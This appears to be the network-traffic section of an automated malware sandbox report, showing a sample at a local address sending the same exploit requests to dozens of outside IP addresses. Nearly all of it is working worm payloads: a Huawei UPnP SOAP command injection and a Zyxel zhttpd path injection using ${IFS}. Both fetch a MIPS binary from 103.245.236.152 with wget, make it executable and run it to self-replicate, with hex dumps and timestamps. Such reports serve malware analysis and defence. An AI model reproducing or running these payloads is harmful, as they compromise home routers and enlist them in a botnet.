61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                            Jan 14, 2024 15:50:56.776390076 CET145INHTTP/1.1 403 Forbidden
                                            Content-Type: text/html;charset=UTF-8
                                            Content-Length: 0
                                            Connection: keep-alive
                                            Cache-control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8836192.168.2.2357142203.76.233.10437215
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.696671009 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Content-Length: 475
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                            Jan 14, 2024 15:50:57.558017015 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Content-Length: 475
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                            Jan 14, 2024 15:50:58.582000971 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Content-Length: 475
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8837192.168.2.235344013.107.196.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770520926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8838192.168.2.2352694149.36.155.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770545006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8839192.168.2.2345366199.193.121.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770597935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8840192.168.2.2354400102.112.42.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770652056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8841192.168.2.234326624.137.211.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770704985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8842192.168.2.2359314151.251.64.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770756006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8843192.168.2.234646424.179.77.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770781994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8844192.168.2.236041263.184.168.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770859957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8845192.168.2.23331385.245.29.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770890951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8846192.168.2.2333548195.89.0.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770917892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8847192.168.2.2355152106.114.17.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.770970106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8848192.168.2.2355842185.123.178.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771053076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8849192.168.2.234780614.1.79.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771065950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8850192.168.2.2338094118.185.75.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771126986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8851192.168.2.234882020.2.44.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771161079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8852192.168.2.2359878119.169.144.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771208048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8853192.168.2.2337142143.20.45.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771229982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8854192.168.2.2347296108.178.179.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771282911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8855192.168.2.2336548107.244.126.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771339893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8856192.168.2.2335000203.144.220.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771384954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8857192.168.2.2337128212.140.246.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771421909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8858192.168.2.234028474.190.175.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771466970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8859192.168.2.2346784103.75.197.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771524906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8860192.168.2.234113414.134.147.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771562099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8861192.168.2.234312457.72.225.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771599054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8862192.168.2.233819485.171.39.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771651983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8863192.168.2.23395261.79.141.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771693945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8864192.168.2.235667065.119.229.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771759033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8865192.168.2.2347884188.185.136.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771780014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8866192.168.2.233340835.73.90.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771852016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8867192.168.2.233869039.255.213.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771914959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8868192.168.2.2356008173.103.51.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.771948099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8869192.168.2.235184860.44.48.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772005081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8870192.168.2.2341348115.160.89.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772038937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8871192.168.2.2342128205.103.113.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772089958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8872192.168.2.2339410183.232.47.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772144079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8873192.168.2.2357640196.130.34.124443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772196054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8874192.168.2.2339768140.63.11.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772248983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8875192.168.2.2354966209.2.44.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:56.772290945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8876192.168.2.2336062101.85.169.224443
                                            TimestampBytes transferredDirectionData
